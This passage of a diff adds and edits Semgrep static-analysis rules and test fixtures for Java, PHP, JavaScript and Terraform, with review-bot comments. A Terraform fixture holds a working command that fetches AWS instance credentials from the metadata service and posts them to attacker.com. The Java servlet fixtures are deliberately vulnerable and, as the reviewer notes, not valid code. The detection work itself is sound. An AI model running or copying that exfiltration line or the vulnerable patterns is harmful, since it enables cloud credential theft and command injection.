req.getParameter(). 
+ param = java.net.URLDecoder.decode(param, "UTF-8"); + + String cmd = + org.owasp.benchmark.helpers.Utils.getInsecureOSCommandString( + this.getClass().getClassLoader()); + String[] args = {cmd}; + String[] argsEnv = {param}; + + Runtime r = Runtime.getRuntime(); + + try { + // ruleid: tainted-env-from-http-request + Process p = r.exec(args, argsEnv); + org.owasp.benchmark.helpers.Utils.printOSCommandResults(p, response); + } catch (IOException e) { + System.out.println("Problem executing cmdi - TestCase"); + response.getWriter() + .println(org.owasp.esapi.ESAPI.encoder().encodeForHTML(e.getMessage())); + return; + } + } +} + +@WebServlet(value = "/cmdi-00/BenchmarkTest00007") +public class bad2 extends HttpServlet { + + private static final long serialVersionUID = 1L; + + @Override + public void doGet(HttpServletRequest request, HttpServletResponse response) + throws ServletException, IOException { + doPost(request, response); + } + + @Override + public void doPost(HttpServletRequest request, HttpServletResponse response) + throws ServletException, IOException { + // some code + response.setContentType("text/html;charset=UTF-8"); + + String param = ""; + if (request.getHeader("BenchmarkTest00007") != null) { + param = request.getHeader("BenchmarkTest00007"); + } + + // URL Decode the header value since req.getHeader() doesn't. Unlike req.getParameter(). 
+ param = java.net.URLDecoder.decode(param, "UTF-8"); + + String cmd = + org.owasp.benchmark.helpers.Utils.getInsecureOSCommandString( + this.getClass().getClassLoader()); + String[] args = {cmd}; + String[] argsEnv = {cmd}; + + Runtime r = Runtime.getRuntime(); + + try { + // ok: tainted-env-from-http-request + Process p = r.exec(args, argsEnv); + org.owasp.benchmark.helpers.Utils.printOSCommandResults(p, response); + + // ok: tainted-env-from-http-request + Process p = r.exec(param, argsEnv); + } catch (IOException e) { + System.out.println("Problem executing cmdi - TestCase"); + response.getWriter() + .println(org.owasp.esapi.ESAPI.encoder().encodeForHTML(e.getMessage())); + return; + } + } +} + diff --git a/java/lang/security/audit/tainted-env-from-http-request.yaml b/java/lang/security/audit/tainted-env-from-http-request.yaml new file mode 100644 index 0000000000..b39620e8d3 --- /dev/null +++ b/java/lang/security/audit/tainted-env-from-http-request.yaml 
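Review bot: The new fixture declares `public class bad2` twice in one file, both mapped to `@WebServlet(value = "/cmdi-00/BenchmarkTest00007")`, and the second doPost declares `Process p` twice in the same try block; none of this is valid Java, and while Semgrep's parser recovers, a duplicate top-level class risks the second servlet's `ok` annotations landing on a definition the engine discards, which would pass the test vacuously. Give the second class its own name and path and the second exec its own variable, e.g. `public class ok1 extends HttpServlet {` and `Process p2 = r.exec(param, argsEnv);`. The second `ok` case is a good negative as written: `param` is tainted but flows into the command while `argsEnv = {cmd}` is untainted, which pins that the rule focuses on the environment argument only.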
@@ -0,0 +1,45 @@
+rules:
+- id: tainted-env-from-http-request
+ message: >-
+ Detected input from a HTTPServletRequest going into the environment variables of an 'exec' command.
+ Instead, call the command with user-supplied arguments by using the overloaded method with one String array as the argument.
+ `exec({"command", "arg1", "arg2"})`.
+ languages: [java]
+ severity: ERROR
+ mode: taint
+ pattern-sources:
+ - patterns:
+ - pattern-either:
+ - pattern: |
+ (HttpServletRequest $REQ)
+ - patterns: # this pattern is a hack to get the rule to recognize `map` as tainted source when `cookie.getValue(user_input)` is used.
+ - pattern-inside: |
+ (javax.servlet.http.Cookie[] $COOKIES) = (HttpServletRequest $REQ).getCookies(...);
+ ...
+ for (javax.servlet.http.Cookie $COOKIE: $COOKIES) {
+ ...
+ }
+ - pattern: |
+ $COOKIE.getValue(...)
+ pattern-sinks:
+ - patterns:
+ - pattern: (java.lang.Runtime $R).exec($CMD, $ENV_ARGS, ...);
+ - focus-metavariable: $ENV_ARGS
+ metadata:
+ category: security
+ technology:
+ - java
+ cwe:
+ - "CWE-454: External Initialization of Trusted Variables or Data Stores"
+ owasp:
+ - A01:2017 - Injection
+ - A03:2021 - Injection
+ references:
+ - https://owasp.org/Top10/A03_2021-Injection
+ cwe2022-top25: false
+ cwe2021-top25: false
+ subcategory:
+ - vuln
+ likelihood: MEDIUM
+ impact: MEDIUM
+ confidence: MEDIUM
diff --git a/java/lang/security/audit/tainted-session-from-http-request.yaml b/java/lang/security/audit/tainted-session-from-http-request.yaml
index 047ecdb96b..7bd3a58c8b 100644
--- a/java/lang/security/audit/tainted-session-from-http-request.yaml
+++ b/java/lang/security/audit/tainted-session-from-http-request.yaml
@@ -49,6 +49,8 @@ rules:
 metavariable: $FUNC
 regex: ^(putValue|setAttribute)$
 - focus-metavariable: $VALUE
+ options:
+ interfile: true
 metadata:
 category: security
 technology:
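Review bot: The sink `(java.lang.Runtime $R).exec($CMD, $ENV_ARGS, ...)` with `focus-metavariable: $ENV_ARGS` covers the `exec(..., String[] envp[, File])` overloads but not `ProcessBuilder.environment().put(...)`, which is the other common route by which request data reaches a child process environment; if that scoping is deliberate, a comment under `pattern-sinks` such as `# scoped to Runtime.exec envp; ProcessBuilder.environment() is not covered` stops the next reader from treating it as an oversight. The `pattern-sources` cookie workaround already has an inline explanation, and the typed-metavariable sink deserves the same, since its matching presumably depends on Semgrep resolving `java.lang.Runtime` (the fixtures add an explicit import for it). The message's remediation, passing user data through the argument array, moves the data out of the environment but is still untrusted input to the child process, which is worth saying in one clause so readers do not read it as a complete fix.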
diff --git a/java/lang/security/audit/xss/no-direct-response-writer.yaml b/java/lang/security/audit/xss/no-direct-response-writer.yaml index 8a1207b0c3..0bccd5dad2 100644 --- a/java/lang/security/audit/xss/no-direct-response-writer.yaml +++ b/java/lang/security/audit/xss/no-direct-response-writer.yaml @@ -6,6 +6,8 @@ rules: scripting (XSS) vulnerabilities. Consider using a view technology such as JavaServer Faces (JSFs) which automatically escapes HTML views. severity: WARNING + options: + interfile: true metadata: likelihood: HIGH impact: MEDIUM diff --git a/java/spring/security/injection/tainted-file-path.yaml b/java/spring/security/injection/tainted-file-path.yaml index 055fba168c..189ec660c7 100644 --- a/java/spring/security/injection/tainted-file-path.yaml +++ b/java/spring/security/injection/tainted-file-path.yaml @@ -8,6 +8,8 @@ rules: file, to include going backwards in the directory with '../'. To address this, ensure that user-controlled variables in file paths are sanitized. You may also consider using a utility method such as org.apache.commons.io.FilenameUtils.getName(...) to only retrieve the file name from the path. + options: + interfile: true metadata: cwe: - 'CWE-23: Relative Path Traversal' diff --git a/java/spring/security/injection/tainted-sql-string.yaml b/java/spring/security/injection/tainted-sql-string.yaml index e4f84c4c9b..cfd0d5474b 100644 --- a/java/spring/security/injection/tainted-sql-string.yaml +++ b/java/spring/security/injection/tainted-sql-string.yaml @@ -33,6 +33,7 @@ rules: options: taint_assume_safe_numbers: true taint_assume_safe_booleans: true + interfile: true mode: taint pattern-sources: - patterns: diff --git a/java/spring/security/injection/tainted-url-host.yaml b/java/spring/security/injection/tainted-url-host.yaml index 01bfd4873e..38baaa1a9e 100644 --- a/java/spring/security/injection/tainted-url-host.yaml +++ b/java/spring/security/injection/tainted-url-host.yaml 
@@ -12,6 +12,8 @@ rules: (This is called server-side request forgery, or SSRF.) Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts hardcode the correct host, or ensure that the user data can only affect the path or parameters. + options: + interfile: true metadata: cwe: - 'CWE-918: Server-Side Request Forgery (SSRF)' diff --git a/javascript/browser/security/open-redirect.yaml b/javascript/browser/security/open-redirect.yaml index 4b2a155d21..da86181ff2 100644 --- a/javascript/browser/security/open-redirect.yaml +++ b/javascript/browser/security/open-redirect.yaml @@ -6,6 +6,8 @@ rules: types of vulnerabilities open-redirection and Cross-Site-Scripting (XSS) with JavaScript URIs. It is recommended to validate user-controllable input before allowing it to control the redirection. + options: + interfile: true metadata: interfile: true cwe: diff --git a/javascript/express/security/audit/express-check-directory-listing.yaml b/javascript/express/security/audit/express-check-directory-listing.yaml index b61a0829a1..afc25b663e 100644 --- a/javascript/express/security/audit/express-check-directory-listing.yaml +++ b/javascript/express/security/audit/express-check-directory-listing.yaml @@ -3,6 +3,8 @@ rules: message: Directory listing/indexing is enabled, which may lead to disclosure of sensitive directories and files. It is recommended to disable directory listing unless it is a public resource. If you need directory listing, ensure that sensitive files are inaccessible when querying the resource. + options: + interfile: true metadata: interfile: true cwe: diff --git a/javascript/express/security/audit/express-libxml-noent.yaml b/javascript/express/security/audit/express-libxml-noent.yaml index 05e979719d..eba8054301 100644 --- a/javascript/express/security/audit/express-libxml-noent.yaml +++ b/javascript/express/security/audit/express-libxml-noent.yaml 
@@ -5,6 +5,8 @@ rules: set to `true` which can lead to being vulnerable to XML External Entities (XXE) type attacks. It is recommended to set `noent` to `false` when using this feature to ensure you are protected. + options: + interfile: true metadata: interfile: true references: diff --git a/javascript/express/security/audit/express-session-hardcoded-secret.yaml b/javascript/express/security/audit/express-session-hardcoded-secret.yaml index f4396789d7..42598cc565 100644 --- a/javascript/express/security/audit/express-session-hardcoded-secret.yaml +++ b/javascript/express/security/audit/express-session-hardcoded-secret.yaml @@ -6,6 +6,8 @@ rules: being leaked and used by either an internal or external malicious adversary. It is recommended to use environment variables to securely provide credentials or retrieve credentials from a secure vault or HSM (Hardware Security Module). + options: + interfile: true metadata: interfile: true cwe: diff --git a/javascript/express/security/audit/express-third-party-object-deserialization.yaml b/javascript/express/security/audit/express-third-party-object-deserialization.yaml index 4cc28aea69..176bb06655 100644 --- a/javascript/express/security/audit/express-third-party-object-deserialization.yaml +++ b/javascript/express/security/audit/express-third-party-object-deserialization.yaml @@ -3,6 +3,8 @@ rules: message: The following function call $SER.$FUNC accepts user controlled data which can result in Remote Code Execution (RCE) through Object Deserialization. It is recommended to use secure data processing alternatives such as JSON.parse() and Buffer.from(). + options: + interfile: true metadata: interfile: true technology: diff --git a/javascript/express/security/audit/res-render-injection.yaml b/javascript/express/security/audit/res-render-injection.yaml index a56cb16355..4f4f39be5d 100644 --- a/javascript/express/security/audit/res-render-injection.yaml +++ b/javascript/express/security/audit/res-render-injection.yaml 
@@ -6,6 +6,8 @@ rules: may attempt to use directory traversal techniques e.g. `../folder/index` to access other HTML pages on the file system. Where possible, do not allow users to define what should be loaded in $RES.render or use an allow list for the existing application. + options: + interfile: true metadata: interfile: true owasp: diff --git a/javascript/express/security/audit/xss/direct-response-write.yaml b/javascript/express/security/audit/xss/direct-response-write.yaml index f5bb6c44f9..370edab86c 100644 --- a/javascript/express/security/audit/xss/direct-response-write.yaml +++ b/javascript/express/security/audit/xss/direct-response-write.yaml @@ -5,6 +5,8 @@ rules: any HTML escaping and may expose your application to a Cross-Site-scripting (XSS) vulnerability. Instead, use 'resp.render()' to render safely escaped HTML. + options: + interfile: true metadata: interfile: true references: diff --git a/javascript/express/security/express-expat-xxe.yaml b/javascript/express/security/express-expat-xxe.yaml index e17e9cb6fc..1b0eb43b72 100644 --- a/javascript/express/security/express-expat-xxe.yaml +++ b/javascript/express/security/express-expat-xxe.yaml @@ -4,6 +4,8 @@ rules: Make sure that unverified user data can not reach the XML Parser, as it can result in XML External or Internal Entity (XXE) Processing vulnerabilities. + options: + interfile: true metadata: interfile: true owasp: diff --git a/javascript/express/security/express-insecure-template-usage.yaml b/javascript/express/security/express-insecure-template-usage.yaml index 4b7484f3e8..0512c2380f 100644 --- a/javascript/express/security/express-insecure-template-usage.yaml +++ b/javascript/express/security/express-insecure-template-usage.yaml 
@@ -2,6 +2,8 @@ rules: - id: express-insecure-template-usage message: User data from `$REQ` is being compiled into the template, which can lead to a Server Side Template Injection (SSTI) vulnerability. + options: + interfile: true metadata: interfile: true category: security diff --git a/javascript/express/security/express-jwt-hardcoded-secret.yaml b/javascript/express/security/express-jwt-hardcoded-secret.yaml index 07032c51dd..e958dd1080 100644 --- a/javascript/express/security/express-jwt-hardcoded-secret.yaml +++ b/javascript/express/security/express-jwt-hardcoded-secret.yaml @@ -6,6 +6,8 @@ rules: being leaked and used by either an internal or external malicious adversary. It is recommended to use environment variables to securely provide credentials or retrieve credentials from a secure vault or HSM (Hardware Security Module). + options: + interfile: true metadata: interfile: true cwe: diff --git a/javascript/express/security/require-request.yaml b/javascript/express/security/require-request.yaml index 546d943aea..780b42bfcf 100644 --- a/javascript/express/security/require-request.yaml +++ b/javascript/express/security/require-request.yaml @@ -3,6 +3,8 @@ rules: message: >- If an attacker controls the x in require(x) then they can cause code to load that was not intended to run on the server. + options: + interfile: true metadata: interfile: true owasp: diff --git a/javascript/jose/security/jwt-hardcode.yaml b/javascript/jose/security/jwt-hardcode.yaml index 1213edb04a..1a481cb9d8 100644 --- a/javascript/jose/security/jwt-hardcode.yaml +++ b/javascript/jose/security/jwt-hardcode.yaml @@ -69,3 +69,4 @@ rules: $JWT.sign($P, JWK.asKey("..."), ...); options: symbolic_propagation: true + interfile: true diff --git a/javascript/lang/security/audit/code-string-concat.yaml b/javascript/lang/security/audit/code-string-concat.yaml index 3f8c24f1fd..0f356c22bd 100644 --- a/javascript/lang/security/audit/code-string-concat.yaml 
+++ b/javascript/lang/security/audit/code-string-concat.yaml @@ -4,6 +4,8 @@ rules: Found data from an Express or Next web request flowing to `eval`. If this data is user-controllable this can lead to execution of arbitrary system commands in the context of your application process. Avoid `eval` whenever possible. + options: + interfile: true metadata: interfile: true confidence: HIGH diff --git a/javascript/lang/security/audit/hardcoded-hmac-key.yaml b/javascript/lang/security/audit/hardcoded-hmac-key.yaml index 1daba1a17e..fe5de29d09 100644 --- a/javascript/lang/security/audit/hardcoded-hmac-key.yaml +++ b/javascript/lang/security/audit/hardcoded-hmac-key.yaml @@ -3,6 +3,8 @@ rules: message: >- Detected a hardcoded hmac key. Avoid hardcoding secrets and consider using an alternate option such as reading the secret from a config file or using an environment variable. + options: + interfile: true metadata: interfile: true category: security diff --git a/javascript/sequelize/security/audit/sequelize-injection-express.yaml b/javascript/sequelize/security/audit/sequelize-injection-express.yaml index b312798223..47aa8ded7f 100644 --- a/javascript/sequelize/security/audit/sequelize-injection-express.yaml +++ b/javascript/sequelize/security/audit/sequelize-injection-express.yaml @@ -5,6 +5,8 @@ rules: could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements. + options: + interfile: true metadata: interfile: true references: diff --git a/php/lang/security/injection/echoed-request.php b/php/lang/security/injection/echoed-request.php index 0349a99efc..b232bcba83 100644 --- a/php/lang/security/injection/echoed-request.php +++ b/php/lang/security/injection/echoed-request.php 
@@ -24,6 +24,10 @@ function doSmth4() { echo "Hello ".htmlentities($_POST['name'])." !".$_POST['lastname']; } +function doSmth5() { + // ruleid: echoed-request + echo "Hello ".trim($_POST['name']); +} function doOK1() { // ok: echoed-request @@ -37,12 +41,9 @@ function doOK2() { } function doOK3() { - $name = $_GET['name']; - if (str_contains($name, 'foobar')) { - $tpl = createSafeTemplate($name); - // ok: echoed-request - echo "Hello :".$tpl; - } + $safevar = "Hello ".htmlentities(trim($_GET['name'])); + // ok: echoed-request + echo $safevar; } function doOK4() { @@ -55,3 +56,17 @@ function doOK5() { // ok: echoed-request echo "Hello $safevar !"; } + +function doOK6() { + $safevar = "Hello ".htmlentities($_GET['name']); + // ok: echoed-request + echo $safevar; +} + +function doOK7() { + $safevar = "Hello ".htmlspecialchars($_GET['name']); + // ok: echoed-request + echo $safevar; +} + + diff --git a/php/lang/security/injection/echoed-request.yaml b/php/lang/security/injection/echoed-request.yaml index 80ef97af84..aeb572ba9d 100644 --- a/php/lang/security/injection/echoed-request.yaml +++ b/php/lang/security/injection/echoed-request.yaml @@ -15,10 +15,8 @@ rules: pattern-sanitizers: - pattern: isset(...) - pattern: empty(...) - - pattern: $X = $ANYFUNC(...); - - patterns: - - pattern-inside: echo <... $ANYFUNC(...) ...>; - - pattern: $ANYFUNC(...) + - pattern: htmlentities(...) + - pattern: htmlspecialchars(...) metadata: technology: - php diff --git a/swift/lang/storage/sensitive-storage-userdefaults.yaml b/swift/lang/storage/sensitive-storage-userdefaults.yaml index bd00b498eb..c5a8c96ee3 100644 --- a/swift/lang/storage/sensitive-storage-userdefaults.yaml +++ b/swift/lang/storage/sensitive-storage-userdefaults.yaml @@ -27,7 +27,7 @@ rules: languages: - swift options: - taint_propagation: true + symbolic_propagation: true patterns: - pattern-either: - patterns: 
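Review bot: Dropping the catch-all `$X = $ANYFUNC(...)` sanitizer in echoed-request.yaml is the right call (the new `doSmth5` case shows why), but the replacement list names only `htmlentities` and `htmlspecialchars`, so every other way of neutralising request data now reports: `intval($_GET['id'])`, `(int) $_GET['id']`, `filter_var(..., FILTER_VALIDATE_INT)` and similar. Consider explicit sanitizer entries for those, or `options: taint_assume_safe_numbers: true` as tainted-sql-string.yaml on this page already uses, and add an `# ok: echoed-request` case with an integer cast to echoed-request.php so the behaviour is pinned. Both escapers are context-dependent (before PHP 8.1 `htmlspecialchars` leaves single quotes untouched unless `ENT_QUOTES` is passed) and the rule cannot see the output context; a sentence in the rule's message (outside this hunk) saying the escaping must match where the value is emitted would stop the "ok" cases reading as a blanket guarantee. The last .php hunk also adds two trailing blank lines.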
diff --git a/terraform/aws/security/aws-provisioner-exec.tf b/terraform/aws/security/aws-provisioner-exec.tf
new file mode 100644
index 0000000000..7c6bdd5bfb
--- /dev/null
+++ b/terraform/aws/security/aws-provisioner-exec.tf
@@ -0,0 +1,71 @@
+
+resource "aws_instance" "example" {
+  ami           = "ami-06ca3ca175f37dd66"
+  instance_type = "t2.micro"
+
+
+  associate_public_ip_address = true
+  # ruleid: aws-provisioner-exec
+  provisioner "remote-exec" {
+    inline = [
+      "sudo yum install ec2-instance-connect -y",
+      "curl http://169.254.169.254/latest/meta-data/iam/security-credentials/tf-testing-role > /tmp/awscreds.txt && curl https://attacker.com/creds.php --data-urlencode creds@/tmp/awscreds.txt"
+    ]
+  }
+
+  iam_instance_profile = "tf-testing-role"
+
+  connection {
+    type        = "ssh"
+    user        = "ec2-user"
+    private_key = tls_private_key.this.private_key_openssh
+    host        = self.public_ip
+    agent       = false
+  }
+
+  key_name = aws_key_pair.this.key_name
+
+  vpc_security_group_ids = [aws_security_group.example.id]
+
+  metadata_options {
+    http_endpoint               = "enabled"
+    http_tokens                 = "optional"
+    http_put_response_hop_limit = 10
+  }
+
+  tags = {
+    Name = "terraform-testing"
+  }
+}
+
+resource "aws_instance" "example" {
+  ami           = "ami-06ca3ca175f37dd66" // make sure to update this to a valid AMI ID
+  instance_type = "t2.micro"
+
+
+  associate_public_ip_address = true
+
+  iam_instance_profile = "tf-testing-role"
+
+  connection {
+    type        = "ssh"
+    user        = "ec2-user"
+    private_key = tls_private_key.this.private_key_openssh
+    host        = self.public_ip
+    agent       = false
+  }
+
+  key_name = aws_key_pair.this.key_name
+
+  vpc_security_group_ids = [aws_security_group.example.id]
+
+  metadata_options {
+    http_endpoint               = "enabled"
+    http_tokens                 = "optional"
+    http_put_response_hop_limit = 10
+  }
+
+  tags = {
+    Name = "terraform-testing"
+  }
+}
\ No newline at end of file
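Review bot: The positive fixture's `inline` list carries a working IMDS credential exfiltration command, while the rule (aws-provisioner-exec.yaml) matches the `provisioner` block with `...` and never inspects the inline strings; a neutral command such as `"echo provisioner ran"` exercises the rule just as well and keeps the test corpus free of ready-to-run payloads. Both blocks are declared as `resource "aws_instance" "example"`, which Terraform rejects as a duplicate resource address, so rename the second (e.g. `"example_ok"`) and mark it `# ok: aws-provisioner-exec` so the negative case is explicit rather than implied. The negative fixture also keeps `http_tokens = "optional"`, i.e. IMDSv1 enabled; as the "good" example a reader will copy it would be better with `http_tokens = "required"`.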
diff --git a/terraform/aws/security/aws-provisioner-exec.yaml b/terraform/aws/security/aws-provisioner-exec.yaml
new file mode 100644
index 0000000000..bfef15e3ba
--- /dev/null
+++ b/terraform/aws/security/aws-provisioner-exec.yaml
@@ -0,0 +1,38 @@
+rules:
+- patterns:
+  - pattern-either:
+    - pattern: |
+        provisioner "remote-exec" {
+          ...
+        }
+    - pattern: |
+        provisioner "local-exec" {
+          ...
+        }
+  - pattern-inside: |
+      resource "aws_instance" "..." {
+        ...
+      }
+  id: aws-provisioner-exec
+  message: Provisioners are a tool of last resort and should be avoided where possible. Provisioner behavior cannot be mapped by Terraform as part of a plan, and execute arbitrary shell commands by design.
+  languages:
+  - terraform
+  severity: WARNING
+  metadata:
+    category: security
+    owasp:
+    - 'A03:2021 - Injection'
+    - 'A01:2017 - Injection'
+    cwe:
+    - "CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')"
+    - "CWE-94: Improper Control of Generation of Code ('Code Injection')"
+    subcategory:
+    - guardrail
+    confidence: HIGH
+    likelihood: HIGH
+    impact: MEDIUM
+    technology:
+    - terraform
+    references:
+    - https://developer.hashicorp.com/terraform/language/resources/provisioners/remote-exec
+    - https://developer.hashicorp.com/terraform/language/resources/provisioners/local-exec
diff --git a/terraform/aws/security/unrestricted-github-oidc-policy.tf b/terraform/aws/security/unrestricted-github-oidc-policy.tf
new file mode 100644
index 0000000000..07fe6a3b80
--- /dev/null
+++ b/terraform/aws/security/unrestricted-github-oidc-policy.tf
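Review bot: The `pattern-inside` restricts the rule to `resource "aws_instance"`, but `local-exec`/`remote-exec` provisioners attach to any resource type (`null_resource` is the usual carrier for `local-exec`), so those blocks go unreported even though the message describes the general problem; `resource $TYPE $NAME { ... }` should cover them, assuming label metavariables bind as they do for the name label elsewhere in the registry, which a fixture case would confirm. If an EC2-only rule is intended, the id and message should say so. Minor: `languages: - terraform` here versus `- hcl` in unrestricted-github-oidc-policy.yaml, both accepted, but one spelling per directory is easier to lint, and the `id:` key placed after `patterns:` reads oddly next to the rest of the repository where `id` comes first.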
@@ -0,0 +1,32 @@
+data "aws_iam_policy_document" "assume-policy-doc" {
+  # ok: unrestricted-github-oidc-policy
+  statement {
+    actions = ["sts:AssumeRoleWithWebIdentity"]
+
+    principals {
+      type        = "Federated"
+      identifiers = ["arn:aws:iam::${data.aws_caller_identity.current.account_id}:oidc-provider/token.actions.githubusercontent.com"]
+    }
+
+    condition {
+      test     = "StringLike"
+      variable = "token.actions.githubusercontent.com:sub"
+
+      values = [
+        "repo:octocat/octocat-app:*",
+      ]
+    }
+  }
+}
+
+data "aws_iam_policy_document" "assume-policy-doc-bad" {
+  # ruleid: unrestricted-github-oidc-policy
+  statement {
+    actions = ["sts:AssumeRoleWithWebIdentity"]
+
+    principals {
+      type        = "Federated"
+      identifiers = ["arn:aws:iam::${data.aws_caller_identity.current.account_id}:oidc-provider/token.actions.githubusercontent.com"]
+    }
+  }
+}
\ No newline at end of file
diff --git a/terraform/aws/security/unrestricted-github-oidc-policy.yaml b/terraform/aws/security/unrestricted-github-oidc-policy.yaml
new file mode 100644
index 0000000000..443847089f
--- /dev/null
+++ b/terraform/aws/security/unrestricted-github-oidc-policy.yaml
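Review bot: The `# ok:` document is also the example a reader will copy, and it lacks the `aud` condition (`StringEquals` on `token.actions.githubusercontent.com:aud` with value `sts.amazonaws.com`) that the GitHub page referenced from the rule recommends alongside the `sub` restriction; adding it keeps the fixture aligned with the documented trust policy. A second `# ruleid:` case with only an `aud` condition and no `sub` condition is worth having too, since that is a common mistake the rule's `not:` clause should still catch and nothing here demonstrates it.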
@@ -0,0 +1,50 @@
+rules:
+  - id: unrestricted-github-oidc-policy
+    metadata:
+      category: security
+      subcategory:
+        - audit
+      likelihood: MEDIUM
+      impact: HIGH
+      confidence: MEDIUM
+      technology:
+        - terraform
+        - aws
+      owasp:
+        - A05:2017 - Sensitive Data Exposure
+        - A01:2021 - Broken Access Control
+      cwe:
+        - "CWE-284: Improper Access Control"
+      references:
+        - https://docs.github.com/en/actions/deployment/security-hardening-your-deployments/configuring-openid-connect-in-amazon-web-services#configuring-the-role-and-trust-policy
+        - https://dagrz.com/writing/aws-security/hacking-github-aws-oidc/
+    message: "`$POLICY` is missing a `condition` block which scopes users of this policy to specific GitHub repositories. Without this, `$POLICY` is open to all users on GitHub. Add a `condition` block on the variable `token.actions.githubusercontent.com:sub` which scopes it to prevent this."
+    languages:
+      - hcl
+    severity: WARNING
+    match:
+      where:
+        - metavariable: $IDENTIFIER
+          regex: .*oidc-provider/token\.actions\.githubusercontent\.com
+      all:
+        - inside: |
+            data "aws_iam_policy_document" $POLICY {
+              ...
+            }
+        - |
+          statement {
+            ...
+            principals {
+              ...
+              type = "Federated"
+              identifiers = [..., $IDENTIFIER, ...]
+            }
+          }
+        - not: |
+            statement {
+              ...
+              condition {
+                ...
+                variable = "token.actions.githubusercontent.com:sub"
+              }
+            }
diff --git a/yaml/semgrep/interfile-true-under-metadata-and-no-options.fixed.test.yaml b/yaml/semgrep/interfile-true-under-metadata-and-no-options.fixed.test.yaml
new file mode 100644
index 0000000000..61a9582b84
--- /dev/null
+++ b/yaml/semgrep/interfile-true-under-metadata-and-no-options.fixed.test.yaml
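Review bot: The `not:` clause only checks that some `condition` names `token.actions.githubusercontent.com:sub`; a condition whose `values` is `["*"]` or `["repo:*"]` satisfies it while the role stays assumable from every repository, so the message's "scopes users of this policy to specific GitHub repositories" is only true for the presence of the block, not its content. A follow-up check on the `values` list (a `metavariable-regex` on the bound values, or a companion rule) that reports a bare `*` or `repo:*` would close that gap, and the .tf fixture has no such case today. Separately, `$IDENTIFIER` is bound from a string containing `${...}` interpolation in the fixture; worth confirming that `metavariable-regex` is applied to the template's text, otherwise the `where` filter silently drops the common form. `languages: - hcl` here versus `- terraform` in aws-provisioner-exec.yaml is a consistency nit.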
@@ -0,0 +1,111 @@ +rules: +- id: libxml2-xxe-taint + message: >- + The application is using an XML parser that has not been safely configured. This might lead to XML + External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include + document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead + to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side + request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs + to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs + Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting + the use of external entities from the start can prevent the parser from being used to process untrusted + XML files. Reducing dependencies on external resources is also a good practice for performance reasons. + It is difficult to guarantee that even a trusted XML file on your server or during transmission has + not been tampered with by a malicious third-party. 
+ severity: ERROR + # ruleid: interfile-true-under-metadata-and-no-options + options: + interfile: true + metadata: + likelihood: MEDIUM + impact: HIGH + confidence: HIGH + interfile: true + category: security + subcategory: + - vuln + cwe: + - 'CWE-611: Improper Restriction of XML External Entity Reference' + cwe2020-top25: true + cwe2021-top25: true + cwe2022-top25: true + owasp: + - A04:2017 - XML External Entities (XXE) + - A05:2021 - Security Misconfiguration + references: + - https://owasp.org/Top10/A05_2021-Security_Misconfiguration + technology: + - go + - libxml2 + - go + - go-net/http + - gin + - gin-gonic/gin + languages: + - go + mode: taint + pattern-sources: + - patterns: + - pattern-either: + - pattern: | + ($REQ : http.Request).$FIELD + - pattern: | + ($REQ : *http.Request).$FIELD + - metavariable-regex: + metavariable: $FIELD + regex: + ^(BasicAuth|Body|Cookie|Cookies|Form|FormValue|GetBody|Host|Header|MultipartReader|ParseForm|ParseMultipartForm|PostForm|PostFormValue|Referer|RequestURI|Trailer|TransferEncoding|URL|UserAgent)$ + - patterns: + - pattern-inside: | + import "github.com/gin-gonic/gin" + ... + - pattern-either: + - patterns: + - pattern-either: + - pattern: | + ($CONTEXT : gin.Context).$FIELD + - pattern: | + ($CONTEXT : *gin.Context).$FIELD + - metavariable-regex: + metavariable: $FIELD + regex: + ^(Cookie|DefaultPostForm|DefaultQuery|FormFile|GetHeader|GetPostForm|GetPostFormArray|GetPostFormMap|GetQuery|GetQueryArray|GetQueryMap|GetRawData|MultipartForm|Param|Params|PostForm|PostFormArray|PostFormMap|Query|QueryArray|QueryMap)$ + - pattern-either: + - pattern: | + ($CONTEXT : gin.Context).Request.URL.Query().Get(...) + - pattern: | + ($CONTEXT : *gin.Context).Request.URL.Query().Get(...) + pattern-sinks: + - patterns: + - patterns: + - pattern-inside: | + import "$IMPORT" + ... 
+ - metavariable-regex: + metavariable: $IMPORT + regex: (.*lestrrat-go/libxml2.*) + - patterns: + - pattern-either: + - patterns: + - pattern-inside: | + $P = parser.New($OPTS) + ... + - pattern: | + $P.$PARSE($INPUT) + - pattern: | + parser.New($OPTS).$PARSE($INPUT) + - pattern: | + NewCtxt($INPUT, $OPTS) + - focus-metavariable: $INPUT + - metavariable-regex: + metavariable: $PARSE + regex: ^(Parse|ParseHTML|ParseHTMLReader|ParseHTMLString|ParseReader|ParseString)$ + - metavariable-pattern: + metavariable: $OPTS + patterns: + - pattern-either: + - pattern: | + XMLParseNoEnt + - pattern: | + parser.XMLParseNoEnt + diff --git a/yaml/semgrep/interfile-true-under-metadata-and-no-options.test.yaml b/yaml/semgrep/interfile-true-under-metadata-and-no-options.test.yaml new file mode 100644 index 0000000000..2a3c3e67a4 --- /dev/null +++ b/yaml/semgrep/interfile-true-under-metadata-and-no-options.test.yaml 
@@ -0,0 +1,109 @@ +rules: +- id: libxml2-xxe-taint + message: >- + The application is using an XML parser that has not been safely configured. This might lead to XML + External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include + document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead + to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side + request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs + to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs + Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting + the use of external entities from the start can prevent the parser from being used to process untrusted + XML files. Reducing dependencies on external resources is also a good practice for performance reasons. + It is difficult to guarantee that even a trusted XML file on your server or during transmission has + not been tampered with by a malicious third-party. 
